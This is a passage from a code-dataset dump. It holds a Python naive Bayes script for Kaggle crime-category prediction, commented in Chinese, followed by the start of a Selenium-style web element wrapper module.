{}\n m_vars = {}\n length = len(crime)\n i = 0\n while(i < length):\n t_da = crime[i]\n if not lists.has_key(t_da):\n lists[t_da] = []\n means[t_da] = 0\n m_vars[t_da] = 0\n i = i + 1\n i = 0\n while(i < length):\n lists[train_one['category'][i]].append(train_one['Y'][i])\n i = i + 1\n for key in lists.keys():\n t_l = lists[key]\n t_a = np.array(t_l)\n means[key] = t_a.mean()\n m_vars[key] = np.cov(t_a)\n #print means\n #print m_vars\n return means,m_vars\n\ndef get_pro(x,mean,var):\n return (1.0/np.sqrt(2*np.pi*var))*np.exp(-1*np.square(x-mean)/(2*var))\n\n\ndef get_final(X_data,Y_results,means_X,means_Y,m_vars_X,m_vars_Y):\n F_Y = []\n X_lengths = Y_results.shape[0]\n i = 0\n while(i < X_lengths):\n t_y = Y_results[i]\n Y_lengths = len(t_y)\n j = 0\n t_X = X_data['X'][i]\n t_Y = X_data['Y'][i]\n while(j < Y_lengths):\n Y_results[i][j] = t_y[j] * get_pro(t_X,means_X[j],m_vars_X[j])*get_pro(t_Y,means_Y[j],m_vars_Y[j])\n j= j + 1\n i = i + 1\n return Y_results\n\n\n#用pandas载入csv训练数据,并解析第一列为日期格式\ntrain=pd.read_csv(r'train.csv', parse_dates = ['Dates'])\ntest=pd.read_csv(r'test.csv', parse_dates = ['Dates'])\ntrain_data = train.copy()\n#print(train.info(),train.describe())\n#用LabelEncoder对不同的犯罪类型编号\nleCrime = preprocessing.LabelEncoder()\ncrime = leCrime.fit_transform(train.Category)\ndel train_data['Category']\ntrain_data.insert(2,'category',crime)\ng_meansX,g_varsX = get_X(crime,train_data)\ng_meansY,g_varsY = get_Y(crime,train_data)\n#print crime\n#因子化星期几,街区,小时等特征\ndays = pd.get_dummies(train.DayOfWeek)\ndistrict = pd.get_dummies(train.PdDistrict)\nhour = train.Dates.dt.hour\nhour = pd.get_dummies(hour)\n#组合特征\ntrainData = pd.concat([hour, days, district,train['X'],train['Y']], axis=1)\ntrainData['crime']=crime\n#print trainData\n#print trainData.dtypes\n#对于测试数据做同样的处理\ndays = pd.get_dummies(test.DayOfWeek)\ndistrict = pd.get_dummies(test.PdDistrict)\nhour = test.Dates.dt.hour\nhour = pd.get_dummies(hour)\ntestData = pd.concat([hour, days, district], axis=1)\nfeatures = ['Friday', 'Monday', 'Saturday', 'Sunday', 'Thursday', 'Tuesday',\n'Wednesday', 'BAYVIEW', 'CENTRAL', 'INGLESIDE', 'MISSION',\n'NORTHERN', 'PARK', 'RICHMOND', 'SOUTHERN', 'TARAVAL', 'TENDERLOIN']\nhourFea = [x for x in range(0,24)]\nfeatures = features + hourFea\n# 分割训练集(3/5)和测试集(2/5)\ntraining, validation = train_test_split(trainData, test_size=0.6)\ndel training['X']\ndel training['Y']\nX_datas = validation['X']\nY_datas = validation['Y']\nlength = X_datas.shape[0]\nindexes = []\ni = 0\nwhile(i < length):\n indexes.append(i)\n i = i + 1\nXX = X_datas.reindex(indexes)\nYY = Y_datas.reindex(indexes)\ndatas = pd.DataFrame()\ndatas.insert(0,'X',XX)\ndatas.insert(0,'Y',YY)\ni = 0\ndel validation['X']\ndel validation['Y']\n\n\n'''\nX_train,X_test, y_train, y_test =\ncross_validation.train_test_split(train_data,train_target,test_size=0.4, random_state=0)\ntrain_data:所要划分的样本特征集\ntrain_target:所要划分的样本结果\ntest_size:样本占比,如果是整数的话就是样本的数量\nrandom_state:是随机数的种子。\n随机数种子:其实就是该组随机数的编号,在需要重复试验的时候,保证得到一组一样的随机数。比如你每次都填1,其他参数一样的情况下你得到的随机数组是一样的。但填0或不填,每次都会不一样。\n随机数的产生取决于种子,随机数和种子之间的关系遵从以下两个规则:\n种子不同,产生不同的随机数;种子相同,即使实例不同也产生相同的随机数。\n'''\n# 朴素贝叶斯建模,计算log_loss\nmodel = BernoulliNB()\n'''ernoulliNB假设特征的先验概率为二元伯努利分布,即如下式:\nP(Xj=xjl|Y=Ck)=P(j|Y=Ck)xjl+(1−P(j|Y=Ck)(1−xjl)\n此时l只有两种取值。xjl只能取值0或者1。\nBernoulliNB一共有4个参数,其中3个参数的名字和意义和MultinomialNB完全相同。\n唯一增加的一个参数是binarize。这个参数主要是用来帮BernoulliNB处理二项分布的,\n可以是数值或者不输入。如果不输入,则BernoulliNB认为每个数据特征都已经是二元的。\n否则的话,小于binarize的会归为一类,大于binarize的会归为另外一类。\n在使用BernoulliNB的fit或者partial_fit方法拟合数据后,我们可以进行预测。\n此时预测有三种方法,包括predict,predict_log_proba和predict_proba。 \npredict方法就是我们最常用的预测方法,直接给出测试集的预测类别输出。\npredict_proba则不同,它会给出测试集样本在各个类别上预测的概率。\n容易理解,predict_proba预测出的各个类别概率里的最大值对应的类别,也就是predict方法得到类别。\npredict_log_proba和predict_proba类似,它会给出测试集样本在各个类别上预测的概率的一个对数转化。\n转化后predict_log_proba预测出的各个类别对数概率里的最大值对应的类别,也就是predict方法得到类别。。'''\nnbStart = time.time()\nmodel.fit(training[features], training['crime'])\n'''partial_fit说明:增量的训练一批样本 \n这种方法被称为连续几次在不同的数据集,从而实现核心和在线学习,这是特别有用的,当数据集很大的时候,不适合在内存中运算 \n该方法具有一定的性能和数值稳定性的开销,因此最好是作用在尽可能大的数据块(只要符合内存的预算开销) '''\nnbCostTime = time.time() - nbStart#消耗的时间\nt_result = model.predict_proba(validation[features])\nF_predicted = get_final(datas,t_result,g_meansX,g_varsX,g_meansY,g_varsY)\n\npredicted = np.array(model.predict_proba(validation[features]))\n#print predicted\nprint(\"朴素贝叶斯建模耗时 %f 秒\" %(nbCostTime))\nprint(\"朴素贝叶斯log损失为 %f\" %(log_loss(validation['crime'], F_predicted)))","repo_name":"WXW322/biology_search","sub_path":"project_kaggle/personal/model_one.py","file_name":"model_one.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"21532528954","text":"from . import wait, app\n\n\nclass Element(app.BaseItem):\n \"\"\"Base HTML Element\n\n Except where noted: methods using self.reference should have an _update_reference run before it\n \"\"\"\n\n item_type = 'Element'\n\n def _wait_for_page_to_load(self, timeout=None, expected_url_change=True, check_ready_state=False,\n check_staleness=True, tabs=0):\n \"\"\"Perform wait until page is detected as stale or url is changed\n\n :param float timeout: timeout to expire, in seconds\n :param bool expected_url_change: if True, expects for a link change to happen\n :param bool check_ready_state: if True, check for DOM ready state\n :param bool check_staleness: if True, check for page staleness\n :param int tabs: the number of tabs to prepend messages\n \"\"\"\n\n tabs_plus_one = tabs + 1\n self.utils.start_timer('page_load', self.timers, tabs=tabs_plus_one)\n\n if timeout is None:\n timeout = wait.PAGE_TIMEOUT\n\n if not self._is_reference_page_stale():\n self._wait_until_page_loaded(self, timeout, check_staleness=check_staleness,\n check_ready_state=check_ready_state)\n\n if expected_url_change:\n url_message = \"Changes expected but url did not change: {}\".format(self._page_url) \\\n if self._page_url == self.source.browser.current_url \\\n else \"Change in url detected: {}\".format(self.source.browser.current_url)\n self.utils.console(url_message, tabs=tabs_plus_one)\n elif self._is_reference_page_stale():\n self.utils.console(\"Page change detected.\", tabs=tabs_plus_one)\n\n self._page_url = self.source.browser.current_url\n self.utils.time_elapsed('page_load', self.timers, tabs=tabs_plus_one)\n\n\nclass Image(Element):\n \"\"\"Representing Image \"\"\"\n\n @property\n def file_path(self):\n \"\"\"Get image source path\n\n Note: this is the same as source_url property\n \"\"\"\n\n return self.source_url\n\n\nclass Caption(Element):\n \"\"\"Representing Caption/ Text element\"\"\"\n\n def click(self, message='', update=True):\n \"\"\"Perform a click operation\n\n :param str message: the message to display\n :param bool update: if True, runs update reference first\n \"\"\"\n\n if update:\n self._update_reference(force=self.angular)\n\n self._perform_click(message, use_script=True)\n\n\nclass Label(Caption):\n \"\"\"Representing